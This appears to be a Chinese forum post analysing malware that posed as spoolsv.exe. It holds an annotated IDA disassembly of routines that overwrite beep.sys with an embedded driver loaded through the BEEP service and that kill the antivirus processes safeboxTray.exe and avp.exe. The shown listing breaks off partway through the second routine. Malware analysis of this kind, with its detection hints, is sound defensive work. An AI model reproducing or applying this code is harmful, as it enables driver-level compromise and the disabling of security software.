近日,被学生的无知无畏搞的心神不宁,精神恍惚,本无心仔细分析此病毒;怎奈同事相求,只好勉强为之。起初只想重装系统草草了事,但次日又有问题,打印机不能用,只好抓出这个冒充spoolsv.exe的家伙研究一番。将其载入ida pro,一看启始代码就想骂人,花他妈的个头,还花呢,最后还是ida厉害,竟然能揪出如下的龌龊代码,稍微猜一下就知道他干什么了。感叹世事不公呀,国家培养出的人只能搞自家人,这就是现代教育的结果。
无语!其余的自己看吧!!!(简要说明,便于对照下面的反汇编:1) 第一段例程用 call/pop 技巧取内联字符串并动态解析 kernel32/Advapi32 导出,把一块 0xB64 字节、以 0x69 异或加密的数据解码后覆盖写入 system32\drivers\beep.sys,再对 "BEEP" 服务先 Stop 后 StartService,借系统自带服务项加载该驱动;2) 第二段例程用 Toolhelp 枚举进程,匹配 safeboxTray.exe 与 avp.exe 后,先以 PROCESS_QUERY_INFORMATION 打开,再用 NtDuplicateObject 把句柄提升为 PROCESS_ALL_ACCESS,然后 TerminateProcess;3) 第三段为入口,GetVersion 判定为 NT 系列后依次调用前两段,最后用调用方给的单字节密钥异或解码一块缓冲区。)
; ---------------------------------------------------------------------------
; Routine 1 -- sub_1314F6C0: overwrite beep.sys with an embedded driver and
; load it through the stock "BEEP" service.  x86-32 Windows, IDA Pro listing.
; Entry (register-based, caller-supplied):
;   eax -> table of two function pointers.  [eax] is called with a single
;          DLL-name argument and yields a module handle; [eax+4] is called
;          with (module, export-name) and yields an address that is then
;          called.  Presumably LoadLibraryA / GetProcAddress -- confirm at
;          the caller (routine 3 fills this table from two pointer slots).
; Exit: no meaningful return value.  Every failure falls through to the
;       common epilogue at loc_1314FA30 without reporting anything.
; Techniques visible in the code below:
;   * call/pop string fetch: `call loc_X` pushes the address of the inline
;     `db` string that follows the call; `pop [ebp-N]` keeps that pointer.
;     DLL and API names therefore never sit in a data section.
;   * run-time import resolution of kernel32 and Advapi32 exports.
;   * self-located payload: call $+5 / pop ebx / sub ebx,45B178h gives the
;     load delta; the blob is at delta+45B32Ch (= 1314FA38h in this image)
;     and is 45BE90h-45B32Ch = 0B64h bytes long -- exactly the gap between
;     this routine's retn (1314FA36h) and the next routine (1315059Ch).
;     It is XOR-decoded in place with key 69h.
;   * SCM abuse: stop "BEEP", write the decoded blob over
;     <SystemDirectory>\drivers\beep.sys, then StartService so the stock
;     service entry loads the attacker's driver.  Retried up to 11 times.
; Detection hints: CreateFile(GENERIC_WRITE, CREATE_ALWAYS) on
; system32\drivers\beep.sys; SERVICE_CONTROL_STOP followed by StartService on
; "BEEP"; OpenSCManager with SC_MANAGER_ALL_ACCESS from a user process.
; The scattered `mov reg, reg` / `nop` instructions are no-op filler.
; ---------------------------------------------------------------------------
seg004:1314F6C0 push ebp
seg004:1314F6C1 mov ebp, esp
seg004:1314F6C3 add esp, 0FFFFFE68h ; esp -= 198h: locals incl. path buffer (ebp-195h) and SERVICE_STATUS (ebp-90h)
seg004:1314F6C9 push ebx
seg004:1314F6CA push esi
seg004:1314F6CB push edi
seg004:1314F6CC mov [ebp-40h], eax ; [ebp-40h] = loader table (see header)
seg004:1314F6CF mov eax, eax ; filler
seg004:1314F6D1 call loc_1314F6E2 ; pushes the address of the string below
seg004:1314F6D6 aClosehandle db 'CloseHandle',0
seg004:1314F6E2
seg004:1314F6E2 loc_1314F6E2: ; CODE XREF: seg004:1314F6D1p
seg004:1314F6E2 pop dword ptr [ebp-4] ; [ebp-4] = "CloseHandle"
seg004:1314F6E5 mov esp, esp ; filler
seg004:1314F6E7 call loc_1314F6F5
seg004:1314F6EC aKernel32 db 'kernel32',0
seg004:1314F6F5
seg004:1314F6F5 loc_1314F6F5: ; CODE XREF: seg004:1314F6E7p
seg004:1314F6F5 pop dword ptr [ebp-8] ; [ebp-8] = "kernel32"
seg004:1314F6F8 mov ebp, ebp ; filler
seg004:1314F6FA call loc_1314F70B
seg004:1314F6FF aCreatefilea db 'CreateFileA',0
seg004:1314F70B
seg004:1314F70B loc_1314F70B: ; CODE XREF: seg004:1314F6FAp
seg004:1314F70B pop dword ptr [ebp-0Ch] ; [ebp-0Ch] = "CreateFileA"
seg004:1314F70E nop ; filler
seg004:1314F70F call loc_1314F71D
seg004:1314F714 aAdvapi32 db 'Advapi32',0
seg004:1314F71D
seg004:1314F71D loc_1314F71D: ; CODE XREF: seg004:1314F70Fp
seg004:1314F71D pop dword ptr [ebp-10h] ; [ebp-10h] = "Advapi32"
seg004:1314F720 mov eax, eax ; filler
seg004:1314F722 call loc_1314F731
seg004:1314F727 aWritefile db 'WriteFile',0
seg004:1314F731
seg004:1314F731 loc_1314F731: ; CODE XREF: seg004:1314F722p
seg004:1314F731 pop dword ptr [ebp-14h] ; [ebp-14h] = "WriteFile"
seg004:1314F734 mov esp, esp ; filler
seg004:1314F736 call loc_1314F74F
seg004:1314F73B aGetsystemdirec db 'GetSystemDirectoryA',0
seg004:1314F74F
seg004:1314F74F loc_1314F74F: ; CODE XREF: seg004:1314F736p
seg004:1314F74F pop dword ptr [ebp-18h] ; [ebp-18h] = "GetSystemDirectoryA"
seg004:1314F752 mov eax, [ebp-8]
seg004:1314F755 push eax
seg004:1314F756 mov eax, [ebp-40h]
seg004:1314F759 call dword ptr [eax] ; esi = loader("kernel32")
seg004:1314F75B mov esi, eax
seg004:1314F75D test esi, esi
seg004:1314F75F jz loc_1314FA30 ; give up silently if kernel32 cannot be obtained
seg004:1314F765 mov eax, [ebp-10h]
seg004:1314F768 push eax
seg004:1314F769 mov eax, [ebp-40h]
seg004:1314F76C call dword ptr [eax] ; ebx = loader("Advapi32")
seg004:1314F76E mov ebx, eax
seg004:1314F770 test ebx, ebx
seg004:1314F772 jz loc_1314FA30
seg004:1314F778 mov edi, [ebp-40h] ; edi = loader table; [edi+4] = resolver
seg004:1314F77B mov eax, [ebp-4]
seg004:1314F77E push eax
seg004:1314F77F push esi
seg004:1314F780 call dword ptr [edi+4] ; resolve(kernel32, "CloseHandle")
seg004:1314F783 mov [ebp-64h], eax ; [ebp-64h] = CloseHandle
seg004:1314F786 mov eax, [ebp-18h]
seg004:1314F789 push eax
seg004:1314F78A push esi
seg004:1314F78B call dword ptr [edi+4] ; resolve(kernel32, "GetSystemDirectoryA")
seg004:1314F78E mov [ebp-58h], eax ; [ebp-58h] = GetSystemDirectoryA
seg004:1314F791 mov eax, [ebp-0Ch]
seg004:1314F794 push eax
seg004:1314F795 push esi
seg004:1314F796 call dword ptr [edi+4] ; resolve(kernel32, "CreateFileA")
seg004:1314F799 mov [ebp-5Ch], eax ; [ebp-5Ch] = CreateFileA
seg004:1314F79C mov eax, [ebp-14h]
seg004:1314F79F push eax
seg004:1314F7A0 push esi
seg004:1314F7A1 call dword ptr [edi+4] ; resolve(kernel32, "WriteFile")
seg004:1314F7A4 mov [ebp-60h], eax ; [ebp-60h] = WriteFile
seg004:1314F7A7 call loc_1314F7BB ; Advapi32 export names, same call/pop trick
seg004:1314F7AC aOpenscmanagera db 'OpenSCManagerA',0
seg004:1314F7BB
seg004:1314F7BB loc_1314F7BB: ; CODE XREF: seg004:1314F7A7p
seg004:1314F7BB pop dword ptr [ebp-1Ch] ; [ebp-1Ch] = "OpenSCManagerA"
seg004:1314F7BE call loc_1314F7D0
seg004:1314F7C3 aOpenservicea db 'OpenServiceA',0
seg004:1314F7D0
seg004:1314F7D0 loc_1314F7D0: ; CODE XREF: seg004:1314F7BEp
seg004:1314F7D0 pop dword ptr [ebp-20h] ; [ebp-20h] = "OpenServiceA"
seg004:1314F7D3 call loc_1314F7E6
seg004:1314F7D8 aStartservicea db 'StartServiceA',0
seg004:1314F7E6
seg004:1314F7E6 loc_1314F7E6: ; CODE XREF: seg004:1314F7D3p
seg004:1314F7E6 pop dword ptr [ebp-24h] ; [ebp-24h] = "StartServiceA"
seg004:1314F7E9 call loc_1314F7FD
seg004:1314F7EE aControlservice db 'ControlService',0
seg004:1314F7FD
seg004:1314F7FD loc_1314F7FD: ; CODE XREF: seg004:1314F7E9p
seg004:1314F7FD pop dword ptr [ebp-28h] ; [ebp-28h] = "ControlService"
seg004:1314F800 mov edi, edi ; filler
seg004:1314F802 call loc_1314F81A
seg004:1314F807 aQueryservicest db 'QueryServiceStatus',0
seg004:1314F81A
seg004:1314F81A loc_1314F81A: ; CODE XREF: seg004:1314F802p
seg004:1314F81A pop dword ptr [ebp-2Ch] ; [ebp-2Ch] = "QueryServiceStatus"
seg004:1314F81D call loc_1314F835
seg004:1314F822 aCloseserviceha db 'CloseServiceHandle',0
seg004:1314F835
seg004:1314F835 loc_1314F835: ; CODE XREF: seg004:1314F81Dp
seg004:1314F835 pop dword ptr [ebp-30h] ; [ebp-30h] = "CloseServiceHandle"
seg004:1314F838 mov eax, eax ; filler
seg004:1314F83A
seg004:1314F83A loc_1314F83A:
seg004:1314F83A mov esi, [ebp-40h] ; esi = loader table; ebx = Advapi32 handle
seg004:1314F83D mov eax, [ebp-1Ch]
seg004:1314F840 push eax
seg004:1314F841 push ebx
seg004:1314F842 call dword ptr [esi+4] ; resolve(Advapi32, "OpenSCManagerA")
seg004:1314F845 mov edi, eax ; edi = OpenSCManagerA
seg004:1314F847 mov eax, [ebp-20h]
seg004:1314F84A push eax
seg004:1314F84B push ebx
seg004:1314F84C call dword ptr [esi+4] ; resolve(Advapi32, "OpenServiceA")
seg004:1314F84F
seg004:1314F84F loc_1314F84F:
seg004:1314F84F mov [ebp-44h], eax ; [ebp-44h] = OpenServiceA
seg004:1314F852 mov eax, [ebp-24h]
seg004:1314F855 push eax
seg004:1314F856 push ebx
seg004:1314F857 call dword ptr [esi+4] ; resolve(Advapi32, "StartServiceA")
seg004:1314F85A mov [ebp-48h], eax ; [ebp-48h] = StartServiceA
seg004:1314F85D mov eax, [ebp-28h]
seg004:1314F860 push eax
seg004:1314F861 push ebx
seg004:1314F862 call dword ptr [esi+4] ; resolve(Advapi32, "ControlService")
seg004:1314F865 mov [ebp-4Ch], eax ; [ebp-4Ch] = ControlService
seg004:1314F868 mov eax, [ebp-2Ch]
seg004:1314F86B push eax
seg004:1314F86C push ebx
seg004:1314F86D
seg004:1314F86D loc_1314F86D:
seg004:1314F86D call dword ptr [esi+4] ; resolve(Advapi32, "QueryServiceStatus")
seg004:1314F870 mov [ebp-50h], eax ; [ebp-50h] = QueryServiceStatus
seg004:1314F873 mov eax, [ebp-30h]
seg004:1314F876 push eax
seg004:1314F877 push ebx
seg004:1314F878 call dword ptr [esi+4] ; resolve(Advapi32, "CloseServiceHandle")
seg004:1314F87B mov [ebp-54h], eax ; [ebp-54h] = CloseServiceHandle
seg004:1314F87E pusha ; save all regs: the delta computation below clobbers ebx
seg004:1314F87F call $+5 ; push EIP of next instruction (1314F884h)
seg004:1314F884 pop ebx ; ebx = 1314F884h (where we actually run)
seg004:1314F885 sub ebx, 45B178h ; ebx = load delta (actual - linked address)
seg004:1314F88B
seg004:1314F88B loc_1314F88B:
seg004:1314F88B lea eax, [ebx+45B32Ch] ; start of embedded encrypted blob (1314FA38h here)
seg004:1314F891 mov [ebp-34h], eax ; [ebp-34h] = blob pointer (advanced by the decode loop)
seg004:1314F894 lea eax, [ebx+45BE90h] ; one-past-end of blob
seg004:1314F89A sub eax, [ebp-34h] ; eax = 0B64h = blob length in bytes
seg004:1314F89D mov [ebp-38h], eax ; [ebp-38h] = blob length
seg004:1314F8A0
seg004:1314F8A0 loc_1314F8A0:
seg004:1314F8A0 call loc_1314F8AA
seg004:1314F8A5 aBeep db 'BEEP',0 ; target service name (stock Windows Beep driver)
seg004:1314F8AA
seg004:1314F8AA loc_1314F8AA: ; CODE XREF: seg004:loc_1314F8A0p
seg004:1314F8AA pop dword ptr [ebp-3Ch] ; [ebp-3Ch] = "BEEP"
seg004:1314F8AD popa ; restore regs (ebx = Advapi32 handle again)
seg004:1314F8AE mov eax, [ebp-38h] ; eax = blob length
seg004:1314F8B1 dec eax
seg004:1314F8B2 test eax, eax ; TEST clears CF, so the JB below can never be taken
seg004:1314F8B4 jb short loc_1314F8C3 ; dead branch; a length of 0 would loop 2^32 times (length is fixed at 0B64h, so moot)
seg004:1314F8B6 inc eax ; eax = length again: counted loop below runs `length` times
seg004:1314F8B7
seg004:1314F8B7 loc_1314F8B7: ; CODE XREF: seg004:1314F8C1j
seg004:1314F8B7 mov edx, [ebp-34h]
seg004:1314F8BA xor byte ptr [edx], 69h ; in-place single-byte XOR decode, key 69h
seg004:1314F8BD inc dword ptr [ebp-34h] ; NOTE: this also moves the stored pointer, yet WriteFile below still passes [ebp-34h] -- it writes from the END of the blob; see the note before the WriteFile call
seg004:1314F8C0 dec eax
seg004:1314F8C1 jnz short loc_1314F8B7
seg004:1314F8C3
seg004:1314F8C3 loc_1314F8C3: ; CODE XREF: seg004:1314F8B4j
seg004:1314F8C3 push 104h ; uSize = MAX_PATH
seg004:1314F8C8 lea eax, [ebp-195h] ; lpBuffer = path buffer
seg004:1314F8CE push eax
seg004:1314F8CF call dword ptr [ebp-58h] ; eax = GetSystemDirectoryA(buf, MAX_PATH) -> length written
seg004:1314F8D2 mov byte ptr [ebp+eax-195h], '\' ; append "\drivers\beep.sys" byte by byte at buf+len (no bounds check against 104h)
seg004:1314F8DA mov byte ptr [ebp+eax-194h], 'd'
seg004:1314F8E2 mov byte ptr [ebp+eax-193h], 'r'
seg004:1314F8EA mov byte ptr [ebp+eax-192h], 'i'
seg004:1314F8F2 mov byte ptr [ebp+eax-191h], 'v'
seg004:1314F8FA mov byte ptr [ebp+eax-190h], 'e'
seg004:1314F902 mov byte ptr [ebp+eax-18Fh], 'r'
seg004:1314F90A mov byte ptr [ebp+eax-18Eh], 's'
seg004:1314F912 mov byte ptr [ebp+eax-18Dh], '\'
seg004:1314F91A mov byte ptr [ebp+eax-18Ch], 'b'
seg004:1314F922 mov byte ptr [ebp+eax-18Bh], 'e'
seg004:1314F92A mov byte ptr [ebp+eax-18Ah], 'e'
seg004:1314F932 mov byte ptr [ebp+eax-189h], 'p'
seg004:1314F93A mov byte ptr [ebp+eax-188h], '.'
seg004:1314F942 mov byte ptr [ebp+eax-187h], 's'
seg004:1314F94A mov byte ptr [ebp+eax-186h], 'y'
seg004:1314F952 mov byte ptr [ebp+eax-185h], 's'
seg004:1314F95A mov byte ptr [ebp+eax-184h], 0 ; NUL terminator -> "<sysdir>\drivers\beep.sys"
seg004:1314F962 push 0F003Fh ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
seg004:1314F967 push 0 ; lpDatabase = NULL
seg004:1314F969 push 0 ; lpMachineName = NULL (local machine)
seg004:1314F96B call edi ; esi = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS)
seg004:1314F96D mov esi, eax
seg004:1314F96F test esi, esi
seg004:1314F971 jbe loc_1314FA30 ; unsigned <= 0, i.e. NULL handle -> exit
seg004:1314F977 push 0F01FFh ; dwDesiredAccess = SERVICE_ALL_ACCESS
seg004:1314F97C mov eax, [ebp-3Ch]
seg004:1314F97F push eax ; lpServiceName = "BEEP"
seg004:1314F980 push esi ; hSCManager
seg004:1314F981 call dword ptr [ebp-44h] ; ebx = OpenServiceA(scm, "BEEP", SERVICE_ALL_ACCESS)
seg004:1314F984 mov ebx, eax
seg004:1314F986 test ebx, ebx
seg004:1314F988 jbe loc_1314FA2C ; NULL -> close SCM and exit
seg004:1314F98E mov edi, 0Bh ; edi = retry counter, 11 attempts
seg004:1314F993
seg004:1314F993 loc_1314F993: ; CODE XREF: seg004:1314FA22j
seg004:1314F993 lea eax, [ebp-90h] ; lpServiceStatus (SERVICE_STATUS on the stack)
seg004:1314F999 push eax
seg004:1314F99A push 1 ; dwControl = SERVICE_CONTROL_STOP
seg004:1314F99C push ebx ; hService
seg004:1314F99D call dword ptr [ebp-4Ch] ; ControlService(svc, SERVICE_CONTROL_STOP, &status); result ignored
seg004:1314F9A0 lea eax, [ebp-90h]
seg004:1314F9A6 push eax
seg004:1314F9A7 push ebx
seg004:1314F9A8 call dword ptr [ebp-50h] ; eax = QueryServiceStatus(svc, &status)
seg004:1314F9AB cmp eax, 1 ; cmp/sbb/inc idiom: al = (eax != 0), i.e. "call succeeded"
seg004:1314F9AE sbb eax, eax
seg004:1314F9B0 inc eax
seg004:1314F9B1 mov [ebp-65h], al ; [ebp-65h] = success flag
seg004:1314F9B4 cmp byte ptr [ebp-65h], 0
seg004:1314F9B8 jz short loc_1314FA21 ; query failed -> retry
seg004:1314F9BA cmp dword ptr [ebp-8Ch], 1 ; status.dwCurrentState (offset +4) == SERVICE_STOPPED ?
seg004:1314F9C1 jnz short loc_1314FA21 ; not yet stopped -> retry (no sleep between attempts)
seg004:1314F9C3 push 0 ; hTemplateFile = NULL
seg004:1314F9C5 push 0 ; dwFlagsAndAttributes = 0
seg004:1314F9C7 push 2 ; dwCreationDisposition = CREATE_ALWAYS (truncates the real beep.sys)
seg004:1314F9C9 push 0 ; lpSecurityAttributes = NULL
seg004:1314F9CB push 1 ; dwShareMode = FILE_SHARE_READ
seg004:1314F9CD push 40000000h ; dwDesiredAccess = GENERIC_WRITE
seg004:1314F9D2 lea eax, [ebp-195h]
seg004:1314F9D8 push eax ; lpFileName = "<sysdir>\drivers\beep.sys"
seg004:1314F9D9 call dword ptr [ebp-5Ch] ; CreateFileA(...)
seg004:1314F9DC mov [ebp-70h], eax ; [ebp-70h] = file handle
seg004:1314F9DF cmp dword ptr [ebp-70h], 0FFFFFFFFh ; INVALID_HANDLE_VALUE ?
seg004:1314F9E3 jz short loc_1314FA21 ; could not open (e.g. file locked while driver loaded) -> retry
seg004:1314F9E5 push 0 ; lpOverlapped = NULL
seg004:1314F9E7 lea eax, [ebp-74h]
seg004:1314F9EA push eax ; lpNumberOfBytesWritten
seg004:1314F9EB mov eax, [ebp-38h]
seg004:1314F9EE push eax ; nNumberOfBytesToWrite = 0B64h
seg004:1314F9EF mov eax, [ebp-34h]
seg004:1314F9F2 push eax ; lpBuffer = [ebp-34h] -- as listed, this pointer was advanced by the decode loop and now points one past the blob; either IDA's listing is incomplete or the real image reloads it. NOTE(review): verify in the binary before asserting what bytes land in beep.sys
seg004:1314F9F3 mov eax, [ebp-70h]
seg004:1314F9F6 push eax ; hFile
seg004:1314F9F7 call dword ptr [ebp-60h] ; eax = WriteFile(h, buf, len, &written, NULL)
seg004:1314F9FA cmp eax, 1 ; al = (eax != 0)
seg004:1314F9FD sbb eax, eax
seg004:1314F9FF inc eax
seg004:1314FA00 mov [ebp-65h], al ; [ebp-65h] = write succeeded
seg004:1314FA03 mov eax, [ebp-70h]
seg004:1314FA06 push eax
seg004:1314FA07 call dword ptr [ebp-64h] ; CloseHandle(file)
seg004:1314FA0A cmp byte ptr [ebp-65h], 0
seg004:1314FA0E jz short loc_1314FA21 ; write failed -> retry
seg004:1314FA10 xor eax, eax
seg004:1314FA12 mov [ebp-6Ch], eax ; [ebp-6Ch] = NULL (empty argv)
seg004:1314FA15 lea eax, [ebp-6Ch]
seg004:1314FA18 push eax ; lpServiceArgVectors -> {NULL}
seg004:1314FA19 push 0 ; dwNumServiceArgs = 0
seg004:1314FA1B push ebx ; hService
seg004:1314FA1C call dword ptr [ebp-48h] ; StartServiceA(svc, 0, &argv): loads the replaced beep.sys as a kernel driver
seg004:1314FA1F jmp short loc_1314FA28 ; success path leaves the retry loop
seg004:1314FA21
seg004:1314FA21 loc_1314FA21: ; CODE XREF: seg004:1314F9B8j
seg004:1314FA21 ; seg004:1314F9C1j ...
seg004:1314FA21 dec edi
seg004:1314FA22 jnz loc_1314F993 ; try again while attempts remain
seg004:1314FA28
seg004:1314FA28 loc_1314FA28: ; CODE XREF: seg004:1314FA1Fj
seg004:1314FA28 push ebx
seg004:1314FA29 call dword ptr [ebp-54h] ; CloseServiceHandle(svc)
seg004:1314FA2C
seg004:1314FA2C loc_1314FA2C: ; CODE XREF: seg004:1314F988j
seg004:1314FA2C push esi
seg004:1314FA2D call dword ptr [ebp-54h] ; CloseServiceHandle(scm)
seg004:1314FA30
seg004:1314FA30 loc_1314FA30: ; CODE XREF: seg004:1314F75Fj
seg004:1314FA30 ; seg004:1314F772j ...
seg004:1314FA30 pop edi
seg004:1314FA31 pop esi
seg004:1314FA32 pop ebx
seg004:1314FA33 mov esp, ebp
seg004:1314FA35 pop ebp
seg004:1314FA36 retn ; no stack args; the encrypted blob (0B64h bytes) follows at 1314FA38h
; ---------------------------------------------------------------------------
; Routine 2 -- sub_1315059C: kill security-product processes.
; Entry (register-based, same convention as routine 1):
;   eax -> loader table; [eax] = get-module-by-name, [eax+4] = resolve
;          export -- presumably LoadLibraryA / GetProcAddress.
; Exit: nothing meaningful returned.
; Behaviour visible below:
;   * resolves kernel32 Toolhelp/process APIs and ntdll!NtDuplicateObject
;     by name at run time (call/pop string fetch, as in routine 1).
;   * snapshots all processes and walks them with Process32First/Next.
;   * case-insensitive match of szExeFile against "safeboxTray.exe" and
;     "avp.exe" (two hard-coded targets, checked in that order).
;   * on a match: OpenProcess with PROCESS_QUERY_INFORMATION only, then
;     NtDuplicateObject(self, h, self, &h, PROCESS_ALL_ACCESS, 0,
;     DUPLICATE_CLOSE_SOURCE) to upgrade the handle to full access, then
;     TerminateProcess.  Opening with a low access mask and escalating via
;     handle duplication is a known way to slip past user-mode hooks that
;     only gate OpenProcess(PROCESS_TERMINATE).
; Robustness gaps a reader should know about: the snapshot handle is not
; checked against INVALID_HANDLE_VALUE, the Process32First result is
; ignored, and the escalated process handle is never closed (CloseHandle
; is only applied to the snapshot).
; Detection hints: OpenProcess(0x400) immediately followed by
; NtDuplicateObject(..., 0x1F0FFF, 0, 1) and TerminateProcess on the same
; handle; lstrcmpiA against the two target names.
; ---------------------------------------------------------------------------
seg004:1315059C ; seg004:131508C6p
seg004:1315059C push ebp
seg004:1315059D mov ebp, esp
seg004:1315059F add esp, 0FFFFFE84h ; esp -= 17Ch: locals incl. PROCESSENTRY32 at ebp-17Ch
seg004:131505A5 push ebx
seg004:131505A6 push esi
seg004:131505A7 push edi
seg004:131505A8 mov [ebp-3Ch], eax ; [ebp-3Ch] = loader table
seg004:131505AB mov eax, eax ; filler
seg004:131505AD call loc_131505BE ; call/pop string fetch
seg004:131505B2 aClosehandle_0 db 'CloseHandle',0
seg004:131505BE
seg004:131505BE loc_131505BE: ; CODE XREF: seg004:131505ADp
seg004:131505BE pop dword ptr [ebp-4] ; [ebp-4] = "CloseHandle"
seg004:131505C1 mov esp, esp ; filler
seg004:131505C3 call loc_131505D1
seg004:131505C8 aKernel32_0 db 'kernel32',0
seg004:131505D1
seg004:131505D1 loc_131505D1: ; CODE XREF: seg004:131505C3p
seg004:131505D1 pop dword ptr [ebp-8] ; [ebp-8] = "kernel32"
seg004:131505D4 mov ebp, ebp ; filler
seg004:131505D6 call loc_131505E7
seg004:131505DB aOpenprocess db 'OpenProcess',0
seg004:131505E7
seg004:131505E7 loc_131505E7: ; CODE XREF: seg004:131505D6p
seg004:131505E7 pop dword ptr [ebp-0Ch] ; [ebp-0Ch] = "OpenProcess"
seg004:131505EA nop ; filler
seg004:131505EB call loc_131505F6
seg004:131505F0 aNtdll db 'Ntdll',0
seg004:131505F6
seg004:131505F6 loc_131505F6: ; CODE XREF: seg004:131505EBp
seg004:131505F6 pop dword ptr [ebp-10h] ; [ebp-10h] = "Ntdll"
seg004:131505F9 mov eax, eax ; filler
seg004:131505FB call loc_13150611
seg004:13150600 aTerminateproce db 'TerminateProcess',0
seg004:13150611
seg004:13150611 loc_13150611: ; CODE XREF: seg004:131505FBp
seg004:13150611 pop dword ptr [ebp-14h] ; [ebp-14h] = "TerminateProcess"
seg004:13150614 mov eax, [ebp-8]
seg004:13150617 push eax
seg004:13150618 mov eax, [ebp-3Ch]
seg004:1315061B
seg004:1315061B loc_1315061B:
seg004:1315061B call dword ptr [eax] ; esi = loader("kernel32")
seg004:1315061D mov esi, eax
seg004:1315061F test esi, esi
seg004:13150621 jz loc_13150804 ; no kernel32 -> exit
seg004:13150627 call loc_13150645
seg004:1315062C aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
seg004:13150645
seg004:13150645 loc_13150645: ; CODE XREF: seg004:13150627p
seg004:13150645 pop dword ptr [ebp-18h] ; [ebp-18h] = "CreateToolhelp32Snapshot"
seg004:13150648 call loc_1315065C
seg004:1315064D aProcess32first db 'Process32First',0
seg004:1315065C
seg004:1315065C loc_1315065C: ; CODE XREF: seg004:13150648p
seg004:1315065C pop dword ptr [ebp-1Ch] ; [ebp-1Ch] = "Process32First"
seg004:1315065F call loc_13150672
seg004:13150664 aProcess32next db 'Process32Next',0
seg004:13150672
seg004:13150672 loc_13150672: ; CODE XREF: seg004:1315065Fp
seg004:13150672 pop dword ptr [ebp-20h] ; [ebp-20h] = "Process32Next"
seg004:13150675 call loc_13150684
seg004:1315067A aLstrcmpia db 'lstrcmpiA',0
seg004:13150684
seg004:13150684 loc_13150684: ; CODE XREF: seg004:13150675p
seg004:13150684 pop dword ptr [ebp-24h] ; [ebp-24h] = "lstrcmpiA"
seg004:13150687 mov edi, [ebp-3Ch] ; edi = loader table; [edi+4] = resolver
seg004:1315068A mov eax, [ebp-14h]
seg004:1315068D push eax
seg004:1315068E push esi
seg004:1315068F call dword ptr [edi+4] ; resolve(kernel32, "TerminateProcess")
seg004:13150692
seg004:13150692 loc_13150692:
seg004:13150692 mov [ebp-40h], eax ; [ebp-40h] = TerminateProcess
seg004:13150695
seg004:13150695 loc_13150695:
seg004:13150695 mov eax, [ebp-0Ch]
seg004:13150698 push eax
seg004:13150699 push esi
seg004:1315069A call dword ptr [edi+4] ; resolve(kernel32, "OpenProcess")
seg004:1315069D
seg004:1315069D loc_1315069D:
seg004:1315069D mov [ebp-54h], eax ; [ebp-54h] = OpenProcess
seg004:131506A0 mov eax, [ebp-4]
seg004:131506A3 push eax
seg004:131506A4 push esi
seg004:131506A5 call dword ptr [edi+4] ; resolve(kernel32, "CloseHandle")
seg004:131506A8 mov [ebp-50h], eax ; [ebp-50h] = CloseHandle
seg004:131506AB mov eax, [ebp-18h]
seg004:131506AE push eax
seg004:131506AF push esi
seg004:131506B0 call dword ptr [edi+4] ; resolve(kernel32, "CreateToolhelp32Snapshot")
seg004:131506B3
seg004:131506B3 loc_131506B3:
seg004:131506B3 mov [ebp-44h], eax ; [ebp-44h] = CreateToolhelp32Snapshot
seg004:131506B6 mov eax, [ebp-1Ch]
seg004:131506B9 push eax
seg004:131506BA push esi
seg004:131506BB call dword ptr [edi+4] ; resolve(kernel32, "Process32First")
seg004:131506BE
seg004:131506BE loc_131506BE:
seg004:131506BE mov [ebp-48h], eax ; [ebp-48h] = Process32First
seg004:131506C1 mov eax, [ebp-20h]
seg004:131506C4 push eax
seg004:131506C5 push esi
seg004:131506C6 call dword ptr [edi+4] ; resolve(kernel32, "Process32Next")
seg004:131506C9 mov [ebp-4Ch], eax ; [ebp-4Ch] = Process32Next
seg004:131506CC
seg004:131506CC loc_131506CC:
seg004:131506CC mov eax, [ebp-24h]
seg004:131506CF push eax
seg004:131506D0 push esi
seg004:131506D1 call dword ptr [edi+4] ; resolve(kernel32, "lstrcmpiA")
seg004:131506D4 mov ebx, eax ; ebx = lstrcmpiA (kept in a register for the loop)
seg004:131506D6 mov eax, [ebp-10h]
seg004:131506D9 push eax
seg004:131506DA mov eax, [ebp-3Ch]
seg004:131506DD call dword ptr [eax] ; esi = loader("Ntdll")
seg004:131506DF mov esi, eax
seg004:131506E1
seg004:131506E1 loc_131506E1:
seg004:131506E1 test esi, esi
seg004:131506E3
seg004:131506E3 loc_131506E3:
seg004:131506E3 jz loc_13150804 ; no ntdll -> exit
seg004:131506E9
seg004:131506E9 loc_131506E9:
seg004:131506E9 call loc_13150700
seg004:131506EE aNtduplicateobj db 'NtDuplicateObject',0 ; native API, bypasses kernel32!DuplicateHandle
seg004:13150700
seg004:13150700 loc_13150700: ; CODE XREF: seg004:loc_131506E9p
seg004:13150700 pop dword ptr [ebp-28h] ; [ebp-28h] = "NtDuplicateObject"
seg004:13150703 mov eax, [ebp-28h]
seg004:13150706 push eax
seg004:13150707 push esi
seg004:13150708 mov eax, [ebp-3Ch]
seg004:1315070B call dword ptr [eax+4] ; resolve(ntdll, "NtDuplicateObject")
seg004:1315070E mov [ebp-38h], eax ; [ebp-38h] = NtDuplicateObject
seg004:13150711 call loc_13150726
seg004:13150716 aSafeboxtray_ex db 'safeboxTray.exe',0 ; target process name #1
seg004:13150726
seg004:13150726 loc_13150726: ; CODE XREF: seg004:13150711p
seg004:13150726 pop dword ptr [ebp-2Ch] ; [ebp-2Ch] = "safeboxTray.exe"
seg004:13150729 call loc_13150736
seg004:1315072E aAvp_exe db 'avp.exe',0 ; target process name #2
seg004:13150736
seg004:13150736 loc_13150736: ; CODE XREF: seg004:13150729p
seg004:13150736 pop dword ptr [ebp-30h] ; [ebp-30h] = "avp.exe"
seg004:13150739 push 0 ; th32ProcessID = 0
seg004:1315073B push 0Fh ; dwFlags = TH32CS_SNAPALL
seg004:1315073D call dword ptr [ebp-44h] ; edi = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0)
seg004:13150740 mov edi, eax ; not checked against INVALID_HANDLE_VALUE
seg004:13150742 mov dword ptr [ebp-17Ch], 128h ; pe.dwSize = 128h = sizeof(PROCESSENTRY32) (ANSI)
seg004:1315074C
seg004:1315074C loc_1315074C:
seg004:1315074C lea eax, [ebp-17Ch]
seg004:13150752 push eax ; lppe
seg004:13150753 push edi ; hSnapshot
seg004:13150754 call dword ptr [ebp-48h] ; Process32First(snap, &pe); return value ignored
seg004:13150757
seg004:13150757 loc_13150757: ; CODE XREF: seg004:131507FAj
seg004:13150757 lea eax, [ebp-158h] ; &pe.szExeFile (offset 24h)
seg004:1315075D push eax
